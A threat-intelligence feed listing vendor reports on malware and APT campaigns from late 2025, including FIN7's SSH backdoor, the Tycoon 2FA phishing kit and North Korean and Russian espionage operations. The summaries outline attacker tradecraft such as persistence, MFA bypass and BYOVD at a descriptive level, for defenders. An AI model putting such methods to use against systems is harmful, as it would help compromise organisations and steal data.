Full ATS Listing

Intel Source:: Twitter

Intel Name:: Windows_SSH_backdoor

Date of Scan:: 2025-11-08

Impact:: MEDIUM

Summary:: PRODAFT researchers have identified that the FIN7 threat group, also known as Savage Ladybug, is actively deploying a Windows-based SSH backdoor to maintain persistent access and exfiltrate data from enterprise systems. This campaign leverages legitimate OpenSSH components along with a batch script to automate deployment and establish covert communication channels between compromised hosts and attacker-controlled servers. By exploiting legitimate SSH protocols, FIN7 establish encrypted reverse SSH and SFTP connections that seamlessly blend with legitimate administrative traffic, making detection highly challenging. The backdoor facilitates persistent remote access, lateral movement, and data theft while leaving minimal forensic traces within security logs.

Source: https://x.com/PRODAFT/status/1985731361492050255

Intel Source:: ASEC researchers

Intel Name:: Beast_Ransomware_Hidden_in_GUI

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) analyzed a newly emerging ransomware group called Beast, which evolved from the Monster ransomware family. The Beast group began operating as a Ransomware-as-a-Service (RaaS) in February 2025 and launched their Tor-based leak site (“Beast Leaks”) in July 2025. As of August 2025, they had publicly named 16 victims across North America, Europe, Asia, and Latin America, targeting multiple sectors such as manufacturing, construction, healthcare, education, and business services. Beast ransomware stands out for its technical sophistication, interactive GUI interface, and advanced anti-recovery mechanisms, making decryption nearly impossible without the attackers’ key."

Source: https://asec.ahnlab.com/en/90792/

Intel Source:: ASEC researchers

Intel Name:: Rhadamanthys_Malware

Date of Scan:: 2025-11-07

Impact:: LOW

Summary:: "Researchers at AhnLab Security Intelligence Center (ASEC) identified a new distribution method for the Rhadamanthys infostealer, a well-known malware family that steals credentials, cryptocurrency wallets, browser data, and system information. In this campaign, threat actors disguise Rhadamanthys as a legitimate Ren’Py visual novel game, a Python-based open-source game engine used by indie developers and available on platforms like Steam. The attackers embed the malware into the game’s script files so that when users run what appears to be a harmless game executable, the malicious loader activates and installs Rhadamanthys in the background. This campaign leverages social engineering and gaming communities (especially free game forums and file-sharing sites like MediaFire) to infect unsuspecting users."

Source: https://asec.ahnlab.com/en/90767/

Intel Source:: Pulsedive

Intel Name:: Kimsuky_JavaScript_Dropper_Analysis

Date of Scan:: 2025-11-07

Impact:: HIGH

Summary:: Researchers at Pulsedive Threat Research have identified a new Kimsuky intrusion chain leveraging a JavaScript-based dropper to establish persistence and exfiltrate system information from Windows hosts. The investigation revealed that the dropper executes multiple stages, beginning with a lightweight JavaScript file responsible for retrieving and executing additional payloads from adversary infrastructure. The subsequent stage performs host reconnaissance by collecting system configuration details, running processes, and directory listings, which are then compressed and transmitted to the attacker’s command server. The malware further modifies Windows registry keys and creates scheduled tasks to maintain continuous execution, ensuring the dropper remains active even after reboot.

Source: https://blog.pulsedive.com/dissecting-the-infection-chain-technical-analysis-of-the-kimsuky-javascript-dropper/

Intel Source:: AhnLab SEcurity intelligence Center

Intel Name:: ActiveMQ_Vulnerability_Exploitation_to_Install_Sharpire

Date of Scan:: 2025-11-06

Impact:: LOW

Summary:: "Researchers at ASEC discovered that the Kinsing (also known as H2Miner) threat actor is exploiting the Apache ActiveMQ vulnerability (CVE-2023-46604) to infect both Linux and Windows systems. The attackers use this flaw to remotely install several malware families, including XMRig (cryptominer), Sharpire (.NET backdoor), Cobalt Strike, and Meterpreter for system control and post-exploitation. This marks a shift in Kinsing’s activity—from simple cryptocurrency mining to full system compromise and remote control—making it a more serious and versatile threat."

Source: https://asec.ahnlab.com/en/90811/

Intel Source:: Cybereason

Intel Name:: Tycoon_2FA_Bypasses_MFA_via_AiTM_Phishing_Kit

Date of Scan:: 2025-11-06

Impact:: HIGH

Summary:: Researchers at Cybereason have identified Tycoon 2FA, a sophisticated Phishing-as-a-Service (PhaaS) kit active since August 2023 that using a reverse-proxy Adversary-in-the-Middle (AiTM) technique to bypass MFA/2FA on Microsoft 365 and Google (Gmail) accounts by intercepting credentials and session cookies in real time for full account compromise. The kit delivers phishing links via PDFs, PowerPoint, SVG files, and malicious websites often hosted on cloud platforms (Amazon S3, Dropbox, Canva), and performs domain, CAPTCHA, debugger, and bot checks prior to redirection to evade automated analysis. Its multi-stage JavaScript chain employs base64, XOR, and AES-encrypted code with CryptoJS-driven dynamic decryption, heavy obfuscation, and memory-only execution, it gathers user-agent and geolocation data, encrypts the data with hardcoded AES keys, and transmits it via AJAX POSTs to attacker-controlled C2 endpoints. The AiTM proxy relays credentials to legitimate servers while dynamically rendering authentic error messages and MFA prompts, making the phishing flow nearly indistinguishable from real logins and the kit’s adaptive design tailors attacks to victims’ authentication policies.

Source: https://www.cybereason.com/blog/tycoon-phishing-kit-analysis

Intel Source:: Cyberwarzone

Intel Name:: SleepyDuck_VSX_Ethereum_Based_C2_Malware

Date of Scan:: 2025-11-06

Impact:: HIGH

Summary:: Researchers at Secure Annex have identified a malicious Visual Studio Extension (VSX) known as SleepyDuck that employs the Ethereum blockchain for command-and-control (C2) operations. Distributed through the Open VSX registry under the guise of a legitimate Solidity development tool, the extension was modified in early November 2025 to include remote access trojan capabilities. Once installed, SleepyDuck connects to Ethereum smart contracts to dynamically update its C2 configuration, making takedown and detection significantly more difficult. The malware periodically polls for new commands, exfiltrates host and user information, and maintains fallback mechanisms using multiple Ethereum Remote Procedure Call (RPC) endpoints to ensure persistence.

Source: https://cyberwarzone.com/2025/11/04/malicious-vsx-extension-sleepyduck-leverages-ethereum-for-command-and-control/

Intel Source:: Cyble

Intel Name:: SSH_Tor_Backdoor_Target_Defence_Sector

Date of Scan:: 2025-11-05

Impact:: MEDIUM

Summary:: Researchers at Cyble have identified a phishing campaign that deploys an SSH-over-Tor backdoor via military-themed lures and weaponized archives. The attack chain is initiated by a malicious .LNK shortcut that executes PowerShell, performs environment checks, stages additional payloads, and then presents benign-appearing decoy documents to minimize detection. Following installation, the implant establishes persistence through a scheduled task and installs OpenSSH alongside Tor components to conceal C2 infrastructure within Tor hidden services. Operators then expose multiple services—SSH, RDP, SMB and SFTP—over those hidden services, enabling full remote administration, credential harvesting, data staging and exfiltration, and lateral movement across the compromised environment.

Source: https://cyble.com/blog/weaponized-military-documents-deliver-backdoor/

Intel Source:: Group-IB

Intel Name:: Phishing_Campaign_Targets_NPM_Developers

Date of Scan:: 2025-11-05

Impact:: HIGH

Summary:: Group-IB researchers uncovered a phishing- based supply chain attack targeting the NPM ecosystem. The campaign began when threat actors compromised a developer’s NPM account by luring them to a fraudulent NPM login portal disguised as a legitimate 2FA update notification. Once the attacker gained full access, they modified around 20 widely used NPM packages to inject a malicious JavaScript-based crypto-clipper. The malware covertly monitored browser and application activity to detect cryptocurrency transactions and replaced legitimate wallet addresses with those controlled by the attackers, impacting multiple cryptocurrencies including Bitcoin, Ethereum, Solana, Tron, Litecoin, and Bitcoin Cash. The phishing emails impersonated official NPM Support communications, evading SPF, DKIM, and DMARC check while leveraging urgency to prompt user action. The compromised packages collectively received about 2.8 billion weekly downloads, underscore the significant potential impact.

Source: https://www.group-ib.com/blog/detect-npm-supply-chain-attack/

Intel Source:: Polyswarm

Intel Name:: MuddyWater_Phoenix_v4_Espionage_Campaign

Date of Scan:: 2025-11-05

Impact:: HIGH

Summary:: Researchers at PolySwarm have identified a new cyber-espionage campaign attributed to the Iran-linked APT MuddyWater, which is actively targeting government entities across the Middle East and North Africa. The operation employs phishing emails sent from compromised accounts accessed via NordVPN, delivering macro-enabled Word documents that execute a FakeUpdate injector to deploy the Phoenix backdoor version 4. Once executed, the malware establishes persistence through Winlogon registry modifications and enables remote access for data exfiltration and command execution. Analysis indicates that the attackers leverage Chromium-based credential stealers and remote monitoring tools such as PDQ and Action1, hosted on the same infrastructure, to maintain access and facilitate post-exploitation activities. Overlaps in macro code, C2 infrastructure, and tool usage link this operation to historical MuddyWater campaigns tied to Iran’s Ministry of Intelligence and Security (MOIS).

Source: https://blog.polyswarm.io/muddywater-targets-mena-governments-with-phoenix-backdoor

Intel Source:: Seqrite

Intel Name:: Operation_Peek_a_Baku_Targets_Central_Asia

Date of Scan:: 2025-11-04

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have identified a new espionage campaign, Operation Peek-a-Baku, orchestrated by Silent Lynx, a Central Asia–focused APT group also known as YoroTrooper and ShadowSilk. Active since at least 2024, the group continues to target diplomatic, government, and infrastructure entities across Tajikistan, Azerbaijan, Russia, and China, demonstrating continuity in tooling with only marginal tradecraft evolution—such as shifting encoded payloads from binaries to GitHub-hosted PowerShell scripts. The campaign relies on spear-phishing emails delivering RAR archives containing LNK files that execute malicious PowerShell reverse shells, deploying payloads like Silent Loader, SilentSweeper, and Laplas implants, which leverage TCP and TLS reverse shells for persistent command execution. The attackers also use Ligolo-ng tunneling to sustain covert network access. Targeting aligns with significant diplomatic summits and projects, including the Russia–Azerbaijan meeting in Dushanbe (October 2025) and the China–Central Asia Summit in Astana (June 2025), reflecting an intelligence-gathering motive focused on strategic communications and infrastructure.

Source: https://www.seqrite.com/blog/operation-peek-a-baku-silent-lynx-apt-dushanbe-espionage/

Intel Source:: Gen Digital

Intel Name:: DPRK_Clusters_HttpTroy_and_BLINDINGCAN_Evolution

Date of Scan:: 2025-11-03

Impact:: HIGH

Summary:: Researchers at Gen Digital Threat Labs have identified two concurrent campaigns conducted by DPRK-linked threat clusters Kimsuky and Lazarus, highlighting significant evolution in their shared tradecraft. Kimsuky executed an espionage-focused operation using a multi-stage intrusion chain beginning with a phishing-delivered archive that deployed the lightweight loader MemLoad and the fully featured backdoor HttpTroy. This toolset enabled persistent remote access, in-memory payload execution, and command-and-control over encrypted HTTP channels, demonstrating refined operational discipline.

Source: https://www.gendigital.com/blog/insights/research/dprk-kimsuky-lazarus-analysis

Intel Source:: Polyswarm

Intel Name:: COLDPRIVER_New_Malware_Toolset_Expansion

Date of Scan:: 2025-11-03

Impact:: HIGH

Summary:: Researchers at PolySwarm have identified a significant evolution in the Russian state-sponsored group COLDPRIVER’s malware arsenal, featuring the introduction of three new families—NOROBOT, YESROBOT, and MAYBEROBOT. The shift followed the public exposure of the LOSTKEYS malware in May 2025 and reflects COLDPRIVER’s ongoing focus on evading detection while maintaining aggressive intelligence collection operations. The group’s infection chain now begins with a deceptive “ClickFix” lure masquerading as a CAPTCHA verification, executing malicious DLL payloads through rundll32. NOROBOT serves as the initial downloader with advanced cryptography and modular staging, while YESROBOT, a Python-based backdoor, and MAYBEROBOT, a PowerShell variant, demonstrate COLDPRIVER’s agile development approach and emphasis on flexible persistence.

Source: https://blog.polyswarm.io/coldriver-updates-its-arsenal

Intel Source:: Seqrite

Intel Name:: Operation_SkyCloak

Date of Scan:: 2025-11-03

Impact:: HIGH

Summary:: Researchers at Seqrite Labs have uncovered a new espionage campaign, dubbed Operation SkyCloak, targeting military personnel in Russia and Belarus, including members of the Russian Airborne Forces (VDV) and Belarusian Special Forces. The operation using spearphishing attachments disguised as official military documents to deliver a multi-stage PowerShell-based stager that deploys a customized OpenSSH server over Tor hidden services, exposing SSH, SMB, and RDP interfaces through obfs4 bridges for covert remote access. The infection chain begins with malicious .LNK files posing as PDFs, which execute embedded PowerShell commands to extract archives and establish persistence through hidden scheduled tasks that repurpose legitimate Windows binaries as SSH and SFTP servers. Each stage is heavily obfuscated and incorporates anti-sandbox checks to evade automated detection. The campaign’s Tor bridge infrastructure is distributed across Germany, France, Poland, and Canada, demonstrating a high degree of operational sophistication. While attribution remains uncertain, Seqrite notes tactical overlaps with Eastern European espionage groups and similarities to pro-Ukraine APT clusters such as Angry Likho and Awaken Likho.

Source: https://www.seqrite.com/blog/operation-skycloak-tor-campaign-targets-military-of-russia-belarus/

Intel Source:: Fortinet

Intel Name:: TruffleNet_Cloud_Credential_Abuse_Campaign

Date of Scan:: 2025-11-03

Impact:: HIGH

Summary:: Researchers at FortiGuard Labs have identified a large-scale cloud abuse campaign dubbed TruffleNet, which exploits compromised Amazon Web Services (AWS) credentials to conduct reconnaissance and facilitate Business Email Compromise (BEC) operations. The threat actors used the open-source tool TruffleHog to automate credential validation and enumeration across AWS environments, focusing particularly on the Simple Email Service (SES) for sending spoofed messages from verified domains. Once access was confirmed, the attackers created fraudulent email identities using stolen DKIM keys from compromised web servers to impersonate trusted organizations and execute targeted financial fraud. The infrastructure supporting TruffleNet spanned hundreds of cloud hosts across multiple providers, orchestrated using Portainer for scalable coordination.

Source: https://www.fortinet.com/blog/threat-research/cloud-abuse-at-scale

Intel Source:: Sophos

Intel Name:: BRONZE_BUTLER_Exploits_LANSCOPE_Zero_Day

Date of Scan:: 2025-11-02

Impact:: HIGH

Summary:: Researchers at Sophos have identified that the Chinese state-sponsored threat group BRONZE BUTLER (also known as Tick) exploited a zero-day vulnerability (CVE-2025-61932) in Motex LANSCOPE Endpoint Manager to exfiltrate sensitive data from Japanese organizations. The flaw enables remote command execution with SYSTEM privileges, facilitating privilege escalation and lateral movement once access is established. Although the number of exposed internet-facing systems is limited, the campaign underscores BRONZE BUTLER’s continued exploitation of Japanese enterprise software, consistent with its prior attacks on IT management tools such as SKYSEA Client View in 2016. In the latest 2025 intrusion wave, CTU identified the use of Gokcpdoor and Havoc C2 frameworks for remote control and persistence, with Gokcpdoor’s updated variant employing multiplexed C2 communications via third-party libraries and dropping KCP protocol support. The OAED Loader malware further enabled stealthy execution through process injection into legitimate executables. The group also leveraged legitimate tools including goddi, Remote Desktop, and 7-Zip for lateral movement and data exfiltration, while cloud services were accessed via browser-based remote sessions to transfer stolen information.

Source: https://news.sophos.com/en-us/2025/10/30/bronze-butler-exploits-japanese-asset-management-software-vulnerability/

Intel Source:: Gen Digital

Intel Name:: Midnight_Ransomware_Flawed_Babuk_Offshoot

Date of Scan:: 2025-11-02

Impact:: MEDIUM

Summary:: Researchers at Gen Digital have identified a new ransomware strain known as Midnight, which appears to be derived from the Babuk ransomware family but exhibits significant cryptographic flaws. Midnight retains Babuk’s overall structure and Ransomware-as-a-Service model, employing a combination of ChaCha20 and RSA encryption to lock victim data. However, implementation weaknesses in the cryptographic routines have made decryption possible under specific conditions, reducing the threat’s impact. The malware primarily targets large organizations in finance, healthcare, and government sectors, using configurable command-line arguments to control its encryption behavior and focusing on critical files such as backups and databases.

Source: https://www.gendigital.com/blog/insights/research/midnight-ransomware

Intel Source:: Unit 42

Intel Name:: Attackers_Exploit_OAuth_to_Access_Microsoft_365

Date of Scan:: 2025-11-02

Impact:: HIGH

Summary:: Researchers at Palo Alto Networks have observed an active phishing campaign exploiting OAuth authorization flows to compromise Microsoft accounts through brand impersonation. The attackers mimic legitimate business and investment platforms such as SAP Concur and Vanguard Funds to deceive users into granting unauthorized access tokens, thereby enabling persistent access to Microsoft tenants without direct credential theft. Victims are lured to attacker-controlled sites that prompt them to paste device codes or approve malicious OAuth applications. In one variant, the SAP Concur impersonation uses a fake login domain to redirect users to the legitimate Microsoft OAuth endpoint, where entering a provided code silently links the victim’s account to an attacker-controlled device. In another, the Vanguard-themed campaign disguises a malicious OAuth authorization link within a PDF, redirecting access tokens to attacker-managed Azure storage endpoints. Both phishing sets share malicious domains hosted on Microsoft’s infrastructure, indicating coordinated use of attacker-owned Azure resources.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-10-23-OAuth-flow-phishing.txt

Intel Source:: 360 Threat Intelligence Center

Intel Name:: Manlingflower_Launches_New_Phishing_Campaign

Date of Scan:: 2025-10-31

Impact:: MEDIUM

Summary:: Researchers at the 360 Threat Intelligence Center have identified that APT-C-08, also known as Manlingflower, a South Asia–linked advanced persistent threat group, has launched a new phishing campaign leveraging ClickOnce application deployment files to remotely install malicious payloads. The operation entices victims to open deceptive Microsoft application files that initiate a multi-stage infection chain, beginning with the Microsoft.application payload, which retrieves a remote manifest and installs secondary binaries such as Launcher.exe, Microsoft.exe, and winsec.exe. Further analysis reveals that Microsoft.exe is a .NET self-contained binary compiled with dotnet publish to execute command-line tasks for persistence creation, while winsec.exe is a C# backdoor communicating with a command-and-control server at port 40269 using AES-encrypted traffic. The final payload maintains persistence via Windows scheduled tasks, beaconing system and user information to attacker infrastructure and enabling additional component downloads. Consistent with previous Manlingflower operations against government, defense, and academic entities in South Asia, the campaign’s objective appears to focus on intelligence collection, credential theft, lateral movement, and sustaining long-term espionage access within targeted networks.

Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247507424&idx=1&sn=8fbea6c6d8317d18e1265119afbeda67&poc_token=HFG-AWmj541Me4q4WVAAF2JbSgBmLWyqC2S-X1Qp

Intel Source:: XLab

Intel Name:: PolarEdge_Expands_via_IoT_Proxy_Network

Date of Scan:: 2025-10-31

Impact:: HIGH

Summary:: Researchers at XLab have uncovered RPX_Client, a new component of the PolarEdge malware ecosystem that integrates compromised IoT devices into a large-scale proxy relay system for covert operations. PolarEdge, first exposed by Sekoia in early 2025, operates an Operational Relay Box (ORB) model, an infrastructure-as-a-service framework leveraging infected IoT endpoints and VPS nodes to obfuscate malicious network traffic. The investigation identified over 140 active RPX servers and more than 25,000 infected devices across 40 countries, with concentrations in South Korea, China, and Southeast Asia. The RPX_Client module enables proxy relaying, remote command execution, and dynamic task redistribution between compromised devices and centralized control servers, allowing reverse, connection proxying that effectively conceals attacker origins through multi-hop IoT routing. The malware achieves persistence via system startup scripts and uses encrypted configuration files to maintain stealth and long-term control.

Source: https://blog.xlab.qianxin.com/smoking-gun-uncovered-rpx-relay-at-polaredges-core-exposed/

Intel Source:: Unit42

Intel Name:: Airstalk_Malware_Nation_State_Supply_Chain_Intrusion

Date of Scan:: 2025-10-30

Impact:: HIGH

Summary:: Researchers at Palo Alto Networks Unit 42 have identified a new malware family named Airstalk being deployed in a suspected nation-state supply chain intrusion. The campaign leverages legitimate VMware AirWatch MDM APIs for covert command-and-control (C2) communications, allowing malicious traffic to blend seamlessly with authorized enterprise management activity. Two variants were discovered: a PowerShell-based loader and a .NET backdoor, both designed to exfiltrate data and maintain operational stealth. The PowerShell variant abuses the /api/mdm/devices/ endpoint to send serialized JSON commands for data theft, screenshots, and Chrome browser credential extraction, while the .NET variant incorporates multi-threaded execution for beaconing, debugging, and log exfiltration. Both samples were digitally signed with legitimate certificates to evade detection. The actor tracked as CL-STA-1009 has targeted organizations within the business process outsourcing (BPO) sector, exploiting trusted relationships to access sensitive client and infrastructure data.

Source: https://unit42.paloaltonetworks.com/new-windows-based-malware-family-airstalk/

Intel Source:: Symantec and Carbon Black

Intel Name:: Russian_APT_Targets_Ukrainian_Organizations

Date of Scan:: 2025-10-30

Impact:: HIGH

Summary:: Researchers at Symantec and Carbon Black have identified an ongoing campaign of Russian-attributed cyberattacks targeting Ukrainian organizations, particularly in the business services and local government sectors. Between June and August 2025, its observed two distinct intrusions characterized by the use of custom webshells, credential harvesting, and advanced Living-off-the-Land (LotL) techniques. The attackers exploited unpatched public-facing servers to deploy the Localolive webshell, previously linked by Microsoft to the Sandworm subgroup Seashell Blizzard, as an initial access vector. Demonstrating strong operational discipline, the actors minimized malware deployment and relied on native Windows utilities such as rundll32, rdrleakdiag, and PowerShell for persistence, reconnaissance, and evasion, even modifying Defender preferences to avoid detection.

Source: https://www.security.com/threat-intelligence/ukraine-russia-attacks

Intel Source:: Securelist (Kaspersky)

Intel Name:: BlueNoroff_GhostCall_and_GhostHire_Ops

Date of Scan:: 2025-10-29

Impact:: HIGH

Summary:: Researchers at Kaspersky have identified two interrelated BlueNoroff operations, codenamed GhostCall and GhostHire, that represent a significant evolution in the group’s financially motivated cyber campaigns. BlueNoroff, a subgroup of the North Korean Lazarus organization, has expanded beyond its traditional bank-heist focus to target cryptocurrency, fintech, and venture-capital sectors through sophisticated macOS and Web3 social engineering. The GhostCall campaign uses fake video meeting invitations and fabricated Zoom or Microsoft Teams update prompts to deliver multi-stage payloads written in Swift, Rust, Go, and Nim, enabling cross-platform persistence and credential theft. Meanwhile, GhostHire impersonates legitimate recruiters on Telegram and GitHub to distribute trojanized development repositories and malicious TypeScript or Go projects to engineers and developers.

Source: https://securelist.com/bluenoroff-apt-campaigns-ghostcall-and-ghosthire/117842/

Intel Source:: Darktrace

Intel Name:: Salt_Typhoon_Citrix_Exploit_Leads_to_Telecom_Intrusion

Date of Scan:: 2025-10-28

Impact:: HIGH

Summary:: Researchers at Darktrace have identified a sophisticated intrusion campaign conducted by the China-linked APT group Salt Typhoon, also known as Earth Estries, GhostEmperor, and UNC2286. The campaign targeted a European telecommunications organization in July 2025, beginning with the exploitation of a Citrix NetScaler Gateway for initial access before pivoting to Citrix Virtual Delivery Agent hosts within the internal network. The attackers deployed a custom SNAPPYBEE (Deed RAT) backdoor through DLL sideloading using legitimate antivirus software, a hallmark of Salt Typhoon’s stealth and persistence techniques. The group demonstrated advanced evasion through multi-channel command-and-control using both HTTP and TCP-based protocols, consistent with its history of blending intelligence collection with geopolitical objectives. Darktrace’s Cyber AI Analyst detected anomalous behaviors early in the intrusion lifecycle, enabling rapid containment before significant lateral movement or data exfiltration occurred.

Source: https://www.darktrace.com/blog/salty-much-darktraces-view-on-a-recent-salt-typhoon-intrusion

Intel Source:: Trend Micro

Intel Name:: Agenda_Ransomware_Cross_Platform_BYOVD_Attack

Date of Scan:: 2025-10-28

Impact:: HIGH

Summary:: Researchers at Trend Micro have identified a sophisticated ransomware campaign conducted by the Agenda group, which deployed a Linux-based ransomware variant on Windows systems through the abuse of remote management tools and bring-your-own-vulnerable-driver (BYOVD) techniques. The operation leveraged legitimate tools such as ScreenConnect and Splashtop Remote to blend malicious activity with routine administrative behavior, complicating detection by standard endpoint defenses. Attackers initiated compromise via social engineering and fake CAPTCHA lures, which led to the download of multi-stage payloads and credential theft from Veeam backup infrastructure to disable recovery options. Following initial access, the group performed privilege escalation using proxy DLLs and PowerShell-based credential extraction, later deploying ransomware through remote sessions to both Windows and Linux systems.

Source: https://www.trendmicro.com/en_us/research/25/j/agenda-ransomware-deploys-linux-variant-on-windows-systems.html

Intel Source:: ESET research

Intel Name:: Lazarus_Targets_EU_Defense_Firms_in_DreamJob_Wave

Date of Scan:: 2025-10-27

Impact:: HIGH

Summary:: Researchers at ESET have identified a new wave of Operation DreamJob, a cyberespionage campaign conducted by Lazarus, a North Korea–aligned APT group, targeting European defense companies involved in UAV (drone) development. Beginning in March 2025, the campaign leveraged social engineering job-offer lures, trojanized open-source software, and DLL side-loading to deploy ScoringMathTea, a remote access trojan (RAT) providing full system control. Victims included three European defense entities—a metal engineering firm, an aircraft components manufacturer, and a defense company—several of which develop UAV hardware or software currently used in Ukraine. This assesses with high confidence that Lazarus aimed to steal proprietary designs and manufacturing knowledge to support North Korea’s domestic drone program. This wave showed notable technical advancements, including DLL proxying, AES/ChaCha20 encryption, and the use of GitHub-hosted open-source tools such as MuPDF, DirectX Wrappers, WinMerge, and Notepad++ plugins as malware loaders. The command-and-control (C2) infrastructure relied on compromised WordPress servers using HTTP(S) and base64-encoded encrypted traffic.

Source: https://www.welivesecurity.com/en/eset-research/gotta-fly-lazarus-targets-uav-sector/

Intel Source:: CyberProof

Intel Name:: Remcos_RAT_Using_Fileless_Phishing_Attacks

Date of Scan:: 2025-10-27

Impact:: HIGH

Summary:: Researchers from CyberProof have identified a significant surge in Remcos RAT campaigns between September and October 2025, distributed through phishing emails containing malicious compressed attachments disguised as business inquiries. The attacks employed fileless execution via obfuscated PowerShell scripts and process hollowing of msiexec.exe into RmClient.exe, effectively evading EDR detection. Once installed, Remcos attempted to access and exfiltrate browser-stored credentials, enabling persistent access to compromised systems. The infection chain began with a .gz attachment that unpacked a malicious batch file executing an encoded PowerShell payload, which retrieved additional components and established command-and-control communications. By leveraging legitimate Microsoft-signed binaries (LOLBins) and encoded PowerShell, the attackers achieved stealthy persistence and credential theft without deploying traditional executables. Although this campaign primarily targeted the financial sector, its credential-harvesting objectives suggest broader risks, as the stolen access could facilitate future ransomware deployments or lateral movement within networks.

Source: https://www.cyberproof.com/blog/fileless-remcos-attacks-on-the-rise/

Intel Source:: Elastic Security Labs

Intel Name:: REF3927_Exploits_IIS_Servers_via_TOLLBOOTH

Date of Scan:: 2025-10-26

Impact:: HIGH

Summary:: Researchers from Elastic Security Labs, in collaboration with Texas A&M University System (TAMUS) Cybersecurity, analyzed the REF3927 campaign, which exploits misconfigured IIS servers reusing publicly exposed ASP.NET machine keys. The threat actor, believed to be Chinese-speaking, deploys a malicious IIS module named TOLLBOOTH to perform SEO cloaking and monetization. Initial access is gained through ViewState deserialization attacks, allowing command execution under the IIS service context. Post-compromise tools include a Godzilla fork webshell (“Z-Godzilla_ekp”), GotoHTTP for remote access, and a modified “Hidden” rootkit to maintain persistence stealthily. TOLLBOOTH exposes a webshell and management channels while manipulating SEO by redirecting human visitors to malicious landing pages and serving keyword-optimized content to search engines. The infrastructure using multiple C2 domains coordinating link farming across over 570 compromised IIS servers worldwide, with deliberate geofencing that excludes mainland China, consistent with Chinese-based threat actor behavior.

Source: https://www.elastic.co/security-labs/tollbooth

Intel Source:: Sekoia

Intel Name:: TransparentTribe_DeskRAT_Linux_Espionage

Date of Scan:: 2025-10-26

Impact:: HIGH

Summary:: Researchers at Sekoia.io have identified a renewed cyber-espionage campaign by the TransparentTribe (APT36) group targeting Indian military and government organizations through the deployment of a new Golang-based remote access trojan dubbed DeskRAT. Active since mid-2025, the campaign leverages phishing emails containing ZIP archives masquerading as legitimate defense-related documents. Upon execution of a malicious .desktop file, the infection chain retrieves and launches a binary payload while displaying a benign PDF decoy to disguise malicious activity. DeskRAT establishes command and control via WebSocket communications, enabling capabilities such as remote command execution, file browsing, data exfiltration, and persistence installation on Linux hosts. The malware employs multiple persistence mechanisms including Systemd services, cron jobs, and bash scripts, enhancing its resilience within targeted environments.

Source: https://blog.sekoia.io/transparenttribe-targets-indian-military-organisations-with-deskrat/

Intel Source:: Symantec and Carbon Black

Intel Name:: Warlock_Ransomware_Linked_to_China_Based_APT

Date of Scan:: 2025-10-26

Impact:: HIGH

Summary:: Researchers at Symantec and Carbon Black have linked the Warlock ransomware, first detected in June 2025, to a China-based threat group with activity dating back to at least 2019. This group exploited a zero-day vulnerability in Microsoft SharePoint (CVE-2025-53770) using the ToolShell exploit, which is also employed by other China-linked APTs such as Budworm (APT27), Sheathminer (APT31), and Storm-2603. Warlock is often deployed alongside or as a replacement for LockBit 3.0, commonly through DLL sideloading involving 7z.exe and 7z.dll. In August 2025, Symantec confirmed Warlock attacks targeting a U.S. firm and a Middle Eastern engineering company, both involving sideloaded 7z.dll loaders and ransom extensions (.x2anylock). Further analysis uncovered a defense evasion tool signed with a stolen certificate named “coolschool” and the use of a vulnerable Baidu driver (renamed googleapiutil64.sys) as part of a Bring Your Own Vulnerable Driver (BYOVD) technique. This certificate was previously associated with the Chinese APT group CamoFei (aka ChamelGang), linking Warlock to historic espionage and ransomware campaigns dating back to 2019.

Source: https://www.security.com/threat-intelligence/warlock-ransomware-origins

Intel Source:: Picus Security

Intel Name:: warmcookie_Evolving_backdoor_with_fileless_execution

Date of Scan:: 2025-10-25

Impact:: MEDIUM

Summary:: "WARMCOOKIE is a type of malicious software recently analyzed by Picus Security. It has evolved to become stealthier and more flexible. The latest version can run many kinds of harmful programs directly in a computer’s memory, making it difficult for antivirus tools to detect. It also hides by using random, professional-looking names for folders and system tasks so it looks like normal company software. Researchers also found that the attackers reuse the same digital security certificates across many servers and don’t bother renewing them, suggesting they frequently rebuild their systems. Overall, Picus Security found that WARMCOOKIE is now better at hiding, harder to detect, and more adaptable meaning defenders need to watch for suspicious behavior, not just rely on basic virus scans"

Source: https://www.picussecurity.com/resource/blog/warmcookie-a-technical-deep-dive-into-a-persistent-backdoors-evolution

Intel Source:: Sentinelone

Intel Name:: PhantomCaptcha_Spearphishing_Targets_Ukraine_NGOs

Date of Scan:: 2025-10-25

Impact:: HIGH

Summary:: Researchers at SentinelLABS and the Digital Security Lab of Ukraine have identified a coordinated spearphishing campaign, codenamed PhantomCaptcha, targeting humanitarian and governmental organizations supporting Ukraine’s war relief efforts. The operation involved weaponized PDF documents impersonating official Ukrainian government correspondence to deliver a multi-stage malware payload. Upon opening, victims were lured into executing a malicious PowerShell command under the guise of a CAPTCHA verification process designed to mimic legitimate Cloudflare security checks. The subsequent infection chain delivered an obfuscated downloader, reconnaissance modules, and a WebSocket-based remote access trojan capable of executing arbitrary commands on the compromised host. Analysis indicates the attackers demonstrated advanced planning, operational security, and compartmentalized infrastructure management, consistent with a state-sponsored or highly organized threat group. The campaign briefly operated in early October 2025 but exhibited precision and technical sophistication suggesting prior preparation.

Source: https://www.sentinelone.com/labs/phantomcaptcha-multi-stage-websocket-rat-targets-ukraine-in-single-day-spearphishing-operation/

Intel Source:: Picusecurity

Intel Name:: Earth_Krahang_APT_Global_Gov_Cyberespionage

Date of Scan:: 2025-10-24

Impact:: HIGH

Summary:: Researchers at Picus Security have identified the Earth Krahang APT group as a cyberespionage actor active since early 2022, conducting coordinated campaigns against government organizations across 23 countries spanning Southeast Asia, Europe, the Americas, and Africa. The group’s operations exploit intergovernmental trust by compromising official infrastructure and using it to launch attacks against other government entities. Earth Krahang has demonstrated advanced operational discipline, achieving at least 70 confirmed intrusions targeting ministries and diplomatic agencies. Its tactics include spear-phishing campaigns using compromised government mailboxes, exploitation of public-facing applications, and abuse of trusted relationships to deliver payloads and establish persistent access. The threat actors employ custom malware loaders, legitimate remote-access tools, and privilege escalation exploits across Windows and Linux systems to maintain footholds and extract sensitive data. Their campaigns reveal a focus on long-term intelligence collection rather than immediate disruption, aligning with traditional state-sponsored espionage patterns.

Source: https://www.picussecurity.com/resource/blog/earth-krahang-apt-group-global-government-cyberespionage-campaigns-2022-2024-and-ttp-analysis

Intel Source:: Koi Security

Intel Name:: TigerJack_Malicious_Developer_Extensions

Date of Scan:: 2025-10-24

Impact:: HIGH

